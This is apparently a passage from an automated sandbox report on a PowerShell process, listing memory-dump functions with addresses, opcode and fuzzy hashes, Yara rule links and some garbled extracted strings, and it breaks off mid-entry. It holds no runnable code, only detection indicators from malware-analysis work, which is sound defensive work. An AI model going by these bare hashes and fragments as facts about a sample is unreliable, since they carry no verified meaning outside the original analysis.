                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 4862c2bdc930e507eaca40b30f144e1c9f71537cc4da807ea8215a330d6132e5
                                                                • Instruction ID: abd708acbe33c079fc66dc897b6618087f8baaed078941ed14fcd317e22fb019
                                                                • Opcode Fuzzy Hash: 4862c2bdc930e507eaca40b30f144e1c9f71537cc4da807ea8215a330d6132e5
                                                                • Instruction Fuzzy Hash: 30F02E767456145BC719565EAC104FE7B99DFC72717010067E51AC7600DE10AD1643F2
                                                                Function 04F690D8 Relevance: .0, Instructions: 40COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1704953015.0000000004F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_4f60000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: fede65368e5945396c84e6598ff76243345cb084e9123f386d3d9daaf131cc28
                                                                • Instruction ID: ecb259d2f90fd438ab034b1c88bfd42622c6961cdef04f97e977456ed30bc460
                                                                • Opcode Fuzzy Hash: fede65368e5945396c84e6598ff76243345cb084e9123f386d3d9daaf131cc28
                                                                • Instruction Fuzzy Hash: 34F022756043045BD711AB34D0143AB7BA6EFC2368F20816AC90A8B381DE3D6806C7A2
                                                                Function 04F67958 Relevance: .0, Instructions: 38COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1704953015.0000000004F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_4f60000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 759b35b8ab33fa66b111d302a46619398d05ea0ae987f0d6eae2623cb571e29c
                                                                • Instruction ID: 0e79c3a8b8bf20d1ded26be0fd04fdca07e01d161ef0f2ce7d41ccb1778dc417
                                                                • Opcode Fuzzy Hash: 759b35b8ab33fa66b111d302a46619398d05ea0ae987f0d6eae2623cb571e29c
                                                                • Instruction Fuzzy Hash: B9F024717013045FD7119A69E888BAFBBE9EF88661F00052DE44AC7751DF34EC4687A0
                                                                Function 0365D9A7 Relevance: .0, Instructions: 37COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1704681818.000000000365D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0365D000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_365d000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 26a8b4c5e41774fd6f44f087fc70dcc5319f633b18a329a21e80ffc4f1c571ba
                                                                • Instruction ID: e7526818b208e18fae93917bebaf3a0892feba0c9bfcde5256dda163ef5f6959
                                                                • Opcode Fuzzy Hash: 26a8b4c5e41774fd6f44f087fc70dcc5319f633b18a329a21e80ffc4f1c571ba
                                                                • Instruction Fuzzy Hash: 4CF0F976600600AFD720CF0AD985C23FBADEBD4670759C56AEC5A8B751C771EC42CEA0
                                                                Function 04F6DE38 Relevance: .0, Instructions: 35COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1704953015.0000000004F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_4f60000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 25462bd089b0eed1a097f8599fbfa245eb4aed2deae3602d1ac9dee46e39a909
                                                                • Instruction ID: 525345d791885f24645774b70fac98356824e55ee69be701b37d56892f96871f
                                                                • Opcode Fuzzy Hash: 25462bd089b0eed1a097f8599fbfa245eb4aed2deae3602d1ac9dee46e39a909
                                                                • Instruction Fuzzy Hash: BBF082397051404FC3108F1DE454CA6BBFAEFCA614319009AE585CB732DA61DC12CB91
                                                                Function 04F69158 Relevance: .0, Instructions: 34COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1704953015.0000000004F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_4f60000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c80ebcaa9bf8027e48dc107a423c33ea3feb48123afcd4c934e14961a1c0b8f2
                                                                • Instruction ID: 4c523066bbbca9c7dcfb71814d1b0caca54089b76cf5c9f8f042c1b5adfef719
                                                                • Opcode Fuzzy Hash: c80ebcaa9bf8027e48dc107a423c33ea3feb48123afcd4c934e14961a1c0b8f2
                                                                • Instruction Fuzzy Hash: 08F082B5A053004FD7609F79D8993EABFE5FF01310F21446AE14EC7241DB3968868BA2
                                                                Function 0365D998 Relevance: .0, Instructions: 33COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1704681818.000000000365D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0365D000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_365d000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: bd14348cc27144685fe0094d6f5690d4e9f16f9e42d0931592c5cd34904cbb52
                                                                • Instruction ID: 800f0f66d6a5aee9fa659f7ee45fc811cab5a0be48cdfd2a3919f1ea56193e67
                                                                • Opcode Fuzzy Hash: bd14348cc27144685fe0094d6f5690d4e9f16f9e42d0931592c5cd34904cbb52
                                                                • Instruction Fuzzy Hash: 6FF0F976100780AFD725CF06C985D23BBB9EB85624B198499FC5A9B352C731FC42CF60
                                                                Function 04F6F7C8 Relevance: .0, Instructions: 33COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1704953015.0000000004F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_4f60000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f6e24a249bc2476938fa0ac62a730d333e0baf115d05889f383ed7bc57086020
                                                                • Instruction ID: 3bf7c48e40e5b14422669839414d840acde184c78f932c7f06342365c51c3656
                                                                • Opcode Fuzzy Hash: f6e24a249bc2476938fa0ac62a730d333e0baf115d05889f383ed7bc57086020
                                                                • Instruction Fuzzy Hash: 5201E472D0074ADBCB04CFE4C8446EDFBB0FF99300F10072AE016A6600EBB06686CB90
                                                                Function 04F67968 Relevance: .0, Instructions: 33COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1704953015.0000000004F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_4f60000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 75bd4ca00bca4491d431ccdd27de5eea832b4f013435ba052c23c9727550b5db
                                                                • Instruction ID: 4460535248b026ae7f49886b15dec78d27a2350f9e437f7e4e9d9505c9a0d0c4
                                                                • Opcode Fuzzy Hash: 75bd4ca00bca4491d431ccdd27de5eea832b4f013435ba052c23c9727550b5db
                                                                • Instruction Fuzzy Hash: 53F0A0367007189FC710AA6AEC44A6FB7E9EB88665B00092DE50AD3751DF34AC4287A4
                                                                Function 04F68969 Relevance: .0, Instructions: 33COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1704953015.0000000004F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_4f60000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 55ea93c4ad5455f134a10e51f2d15ab362247e214655e7d07475b3f56e5b21f4
                                                                • Instruction ID: c9e7a74fc3dc5f06d4ca244f0845c313b7dab10e44027f628050e3ab765147a3
                                                                • Opcode Fuzzy Hash: 55ea93c4ad5455f134a10e51f2d15ab362247e214655e7d07475b3f56e5b21f4
                                                                • Instruction Fuzzy Hash: FDF0A73530C3505BCB0A2776A8193ED3F95AFC5724F05016BD90587241DE6D5D0683EA
                                                                Function 04F67697 Relevance: .0, Instructions: 31COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1704953015.0000000004F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_4f60000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c939f84a03088e88449c3f08c4011b755b24254e821447d421f094dfba2b3eb5
                                                                • Instruction ID: 969054ac49570d050dcb9ff34bc1817154f18e6a09b95e70b60d7725e368605d
                                                                • Opcode Fuzzy Hash: c939f84a03088e88449c3f08c4011b755b24254e821447d421f094dfba2b3eb5
                                                                • Instruction Fuzzy Hash: 1CF0A0797005048FCB10EB7DE840B9A7BE2EBC8655B154169E80ACF324DB76DC068B91
                                                                Function 04F690E8 Relevance: .0, Instructions: 31COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1704953015.0000000004F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_4f60000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f2cc43617504e216f6f6e99bba116f80d9dd29a4a73e6a8bcbd774c7af5c1315
                                                                • Instruction ID: 38ec1eb08752e4c700ac616fdd78a13b24eca6aa4b39a39431f75eba8fd439dd
                                                                • Opcode Fuzzy Hash: f2cc43617504e216f6f6e99bba116f80d9dd29a4a73e6a8bcbd774c7af5c1315
                                                                • Instruction Fuzzy Hash: 8FF027357002045BE314BB64C0143ABB796DFC0769F10813ED90A4B384CE3D6802C7E1
                                                                Function 04F6DE48 Relevance: .0, Instructions: 30COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1704953015.0000000004F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_4f60000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b5db0f0250a86199baa1b44c28d481607e3cad173f1d49f77fef8f5fd0f7d660
                                                                • Instruction ID: 17b598618264c0f7f217564f279a983c1a2a14690e0191e820aea6b20cc52ce0
                                                                • Opcode Fuzzy Hash: b5db0f0250a86199baa1b44c28d481607e3cad173f1d49f77fef8f5fd0f7d660
                                                                • Instruction Fuzzy Hash: 6BE065357001008F83009B1ED488C66B7FAEFDE72531900AAE54ACB330CA21EC02CB80
                                                                Function 04F6AF88 Relevance: .0, Instructions: 29COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1704953015.0000000004F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_4f60000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 8f43806339079823913c42595ef0095caa709b2006b11a2edfda70f9f6c0ec6a
                                                                • Instruction ID: 4cdc1e6e11265ecb504817ecf43fcba11c1702c64af577643f3b584f7a39a9fc
                                                                • Opcode Fuzzy Hash: 8f43806339079823913c42595ef0095caa709b2006b11a2edfda70f9f6c0ec6a
                                                                • Instruction Fuzzy Hash: D1E02662B083D5078B1A813DAC140AABFAB8FC312032A81FBE141CB342EC16980343E2
                                                                Function 04F69549 Relevance: .0, Instructions: 26COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1704953015.0000000004F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_4f60000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 76ab426ef3509f93b472eb1ab74f9788336251ca477206d3e8b159c1cd256e52
                                                                • Instruction ID: 276bd6151f3b95fec25d310057fdda08ba9f324b44520ec5f3d26c478c00c26e
                                                                • Opcode Fuzzy Hash: 76ab426ef3509f93b472eb1ab74f9788336251ca477206d3e8b159c1cd256e52
                                                                • Instruction Fuzzy Hash: 93D01222B0312517556871B91C007F7BACFCAC44E5B05013ADA07C7641EC90EC1743F1
                                                                Function 04F69168 Relevance: .0, Instructions: 25COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1704953015.0000000004F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_4f60000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1e00d3a681a7c4b823691b0e046cd1448dffa6477f7139e47d5d1ba3539fa697
                                                                • Instruction ID: 6542edaa4924cccc0a3ce46fa9969142221a0b797a514a974e6cbd621523c1ae
                                                                • Opcode Fuzzy Hash: 1e00d3a681a7c4b823691b0e046cd1448dffa6477f7139e47d5d1ba3539fa697
                                                                • Instruction Fuzzy Hash: 76F06D709003044BD360DF78D89C79ABBE5FB44310F10446AE54EC7340DB39A8818B90
                                                                Function 04F6F858 Relevance: .0, Instructions: 24COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1704953015.0000000004F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_4f60000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 8a8fc61e124230c58f48fb3a01c79f1a50307fdbf2574a69acd35f1b47682252
                                                                • Instruction ID: 27df25e591ae2ba95dce6ca3b13773f84c1d1f6ebd49a3e30a17cd11398280d1
                                                                • Opcode Fuzzy Hash: 8a8fc61e124230c58f48fb3a01c79f1a50307fdbf2574a69acd35f1b47682252
                                                                • Instruction Fuzzy Hash: 11E01A71D00209AF8B40EFB898426AEFBF4AB49200B10C5AE8919D7301EA3296129BD1
                                                                Function 04F68978 Relevance: .0, Instructions: 24COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1704953015.0000000004F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_4f60000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1988914acce7dd7220fe809a08a2fdf6e1870f5ec19396572b901d98d6bbec0f
                                                                • Instruction ID: 63554e3a2325626b1571f9c82e55c0a2fce9e48b422c905670c0e64a0b2354d5
                                                                • Opcode Fuzzy Hash: 1988914acce7dd7220fe809a08a2fdf6e1870f5ec19396572b901d98d6bbec0f
                                                                • Instruction Fuzzy Hash: 5BE086357046145BCB097775A81C3AE7B56FBC4765F04002AE60A87340CF7D5D1283ED
                                                                Function 04F69550 Relevance: .0, Instructions: 23COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1704953015.0000000004F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_4f60000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 88937c4961d20c9177df31be872670854d19b1169353f623219e048186266ec4
                                                                • Instruction ID: 5ae8366cec5ef1ca6600f8718d18b92920e0e54e710732c3e90c9e1d54cc3d8c
                                                                • Opcode Fuzzy Hash: 88937c4961d20c9177df31be872670854d19b1169353f623219e048186266ec4
                                                                • Instruction Fuzzy Hash: 52D09E52B4322517566475BA1D10BBBB5CFCAC54E5B05013ADA0BC7642ED94EC1743F1
                                                                Function 04F68739 Relevance: .0, Instructions: 23COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1704953015.0000000004F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_4f60000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 110fb18a37943904b6abef285abbbad33cdfbb3d0b73a0c8faf02b21ce81ff73
                                                                • Instruction ID: 52e7e29a6cb89bd95ebc5561f246b3c3d0afda2c6ce9ff691930c94e3614aec0
                                                                • Opcode Fuzzy Hash: 110fb18a37943904b6abef285abbbad33cdfbb3d0b73a0c8faf02b21ce81ff73
                                                                • Instruction Fuzzy Hash: C3E04F319441098BCB09BBB4E80A5FDBF70FF00311F500269D94282580DE241A4BCEC1
                                                                Function 04F6DCE8 Relevance: .0, Instructions: 23COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1704953015.0000000004F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_4f60000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                                                • Instruction ID: b644ecee98414859dab4484a5c4db4247c819abc048c4c297a0d29daa2d7aa92
                                                                • Opcode Fuzzy Hash: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                                                • Instruction Fuzzy Hash: 26E08632B1001497CB089959D4104EDF7AADBCC220F04807AD90AA7340DA32691686E1
                                                                Function 04F6DC98 Relevance: .0, Instructions: 23COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1704953015.0000000004F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_4f60000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: cfe5dc9d921f2a4fa8af3d1076ec0d5bbbdd4581db5a8b76ce40acdd89e6ca39
                                                                • Instruction ID: 9229f101c2acbaa995ff648cddbbd90e8185cbb6e68e1d498a4659cb193b2189
                                                                • Opcode Fuzzy Hash: cfe5dc9d921f2a4fa8af3d1076ec0d5bbbdd4581db5a8b76ce40acdd89e6ca39
                                                                • Instruction Fuzzy Hash: 4DE0C236780B180B8212AA2FA81095FB7DADFC5671310403EE12ACB340DEA4EC0647E5
                                                                Function 04F68800 Relevance: .0, Instructions: 22COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1704953015.0000000004F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_4f60000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 45cbe9a7a06b567a06867ee029fbf2a820fac6a666ecaa16c2e70ec876bae362
                                                                • Instruction ID: a5ec2052f97c09be0679b152fc38e1a1a31a69ff2fef910cb9b93a83c28ee513
                                                                • Opcode Fuzzy Hash: 45cbe9a7a06b567a06867ee029fbf2a820fac6a666ecaa16c2e70ec876bae362
                                                                • Instruction Fuzzy Hash: 37E08671A4820A8BCB14DFB4E4869BEBFF0EB04308F104269ED4597741EB349C81DBC1
                                                                Function 04F6F868 Relevance: .0, Instructions: 16COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1704953015.0000000004F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_4f60000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                • Instruction ID: a9c750124dac7d8a489680529d7729d1c556f96875f2a687f1846c430a09aa54
                                                                • Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                • Instruction Fuzzy Hash: 57D04C71D042099F8780DFA9994156DFBF4AB48200B5085AA8919D7201E63156128BD1
                                                                Function 04F68748 Relevance: .0, Instructions: 15COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1704953015.0000000004F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_4f60000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 6c25c7dc7d9cd9bd22e3dcc5393aba149fe366ceb7f395840993da99215b3326
                                                                • Instruction ID: bc041994a9e3171a4836aa431370ebe1810a5d1e03d256e4dc1c3ac73696181c
                                                                • Opcode Fuzzy Hash: 6c25c7dc7d9cd9bd22e3dcc5393aba149fe366ceb7f395840993da99215b3326
                                                                • Instruction Fuzzy Hash: 42D067319051098BCB08ABA5E85B5BDBB74FB14311F404169D90792590EE352A5ACAC5
                                                                Function 04F68810 Relevance: .0, Instructions: 15COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1704953015.0000000004F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_4f60000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 8896bad06ada91851544f6cd3cc5bfbbd32b899021f976754f5b2db7d38e871b
                                                                • Instruction ID: 44064f5abed6eb5d72e4778b6afc8aec17bb12804fa940d752c777b7e0ddd677
                                                                • Opcode Fuzzy Hash: 8896bad06ada91851544f6cd3cc5bfbbd32b899021f976754f5b2db7d38e871b
                                                                • Instruction Fuzzy Hash: 40D01730A0820A8BCB18EFA4E84696EBBB5AB44300F004169EA4A93380EA346D01CBC1
                                                                Function 04F67EA0 Relevance: .0, Instructions: 11COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1704953015.0000000004F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_4f60000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 0bda9df1087f7c55cdb93173b05107baf4f587ffa5f54782a72bb91f6738eca6
                                                                • Instruction ID: ac62855b458aaa867a99caa3e4ad8d88796929d0f67acbd336f8a597c3e483aa
                                                                • Opcode Fuzzy Hash: 0bda9df1087f7c55cdb93173b05107baf4f587ffa5f54782a72bb91f6738eca6
                                                                • Instruction Fuzzy Hash: 5BC09B5540DAD01AFF528775C8997127EB65B8761DF0D41DCC1C185455C975C445DF03
                                                                Function 04F67932 Relevance: .0, Instructions: 11COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1704953015.0000000004F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_4f60000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e18535b7af30af5f2648e1bef0b9a45f6a63a2ef1c922fe1fe36c2ac20f2da15
                                                                • Instruction ID: a6ecfef79526697bc2432c14d01a63d17a192625d0f4dffe59b23a9f00b297b4
                                                                • Opcode Fuzzy Hash: e18535b7af30af5f2648e1bef0b9a45f6a63a2ef1c922fe1fe36c2ac20f2da15
                                                                • Instruction Fuzzy Hash: 56D012B54483849BDB265F75D0C8A093F65AF02255F0005DCDC4A8A5A3CB36C049CF01
                                                                Function 04F67940 Relevance: .0, Instructions: 8COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1704953015.0000000004F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_4f60000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f6d1da4db5a938baba50a6d9e880f48ab149620ae0708c494c602b0d2b045ecb
                                                                • Instruction ID: adbb3b7c25e146dd952161625d02ddd2753a25b03651046909813f2c10850f11
                                                                • Opcode Fuzzy Hash: f6d1da4db5a938baba50a6d9e880f48ab149620ae0708c494c602b0d2b045ecb
                                                                • Instruction Fuzzy Hash: DBB092310487098FC2496F75E4488157329BB4021938008A8E90E4A6A3CE3AE88ACA45

                                                                Non-executed Functions

                                                                Function 07E21BE0 Relevance: 20.4, Strings: 16, Instructions: 394COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1716831750.0000000007E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_7e20000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $c9k$4'^q$4'^q$4'^q$4'^q$84Dl$84Dl$tP^q$tP^q$JGl$JGl$JGl$JGl$JGl$rFl$rFl
                                                                • API String ID: 0-624996054
                                                                • Opcode ID: d444dcb7455351395c28d4620ffae1572ae6b857bf6c6b538c1caf4f4ca1a231
                                                                • Instruction ID: 7a83398ac594e29eac52646b51c5584b385832b73f6c970568c7b0209b5e3e5c
                                                                • Opcode Fuzzy Hash: d444dcb7455351395c28d4620ffae1572ae6b857bf6c6b538c1caf4f4ca1a231
                                                                • Instruction Fuzzy Hash: 8BD17CB1B06229CFCB248B689404AAAFBB6AFC1314F1494BBD515CF255DB31C9C7C7A1
                                                                Function 07E23928 Relevance: 12.8, Strings: 10, Instructions: 326COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1716831750.0000000007E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_7e20000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q$$^q$<l$<l
                                                                • API String ID: 0-2706008207
                                                                • Opcode ID: 2c2f20084e34f96ef01ae0efc3e43926f4a00f8458c4370678a6283ff68ace1f
                                                                • Instruction ID: 3956d13f844858fe960e9a617a0f616056f013ba79f5a7776e90c0a98cdc1fc1
                                                                • Opcode Fuzzy Hash: 2c2f20084e34f96ef01ae0efc3e43926f4a00f8458c4370678a6283ff68ace1f
                                                                • Instruction Fuzzy Hash: 04A19DB67063658FC7248B699801A66BBB6AFC6210F14847BD445CF351CA39CC86DBA1
                                                                Function 07E20FB8 Relevance: 12.7, Strings: 10, Instructions: 184COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1716831750.0000000007E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_7e20000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: fcq$84Dl$`Q^q$`Q^q$tP^q$$^q$$^q$$^q$$^q$$^q
                                                                • API String ID: 0-2544681757
                                                                • Opcode ID: 34231c39823b6a1ad6b6953e5562d62a4c4a6cb1aaf4988fc9d79c5436de0115
                                                                • Instruction ID: 4c6f5a9eda5ad3a6eb67a25984feb4f0a6fbe62f02fb4e0ac6977a45e80da45b
                                                                • Opcode Fuzzy Hash: 34231c39823b6a1ad6b6953e5562d62a4c4a6cb1aaf4988fc9d79c5436de0115
                                                                • Instruction Fuzzy Hash: 8061E2B0A0626EDFDB24CE48C444BEA77F2BB45349F159055F8019B291C731DEC6EBA1
                                                                Function 07E23678 Relevance: 8.9, Strings: 7, Instructions: 191COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
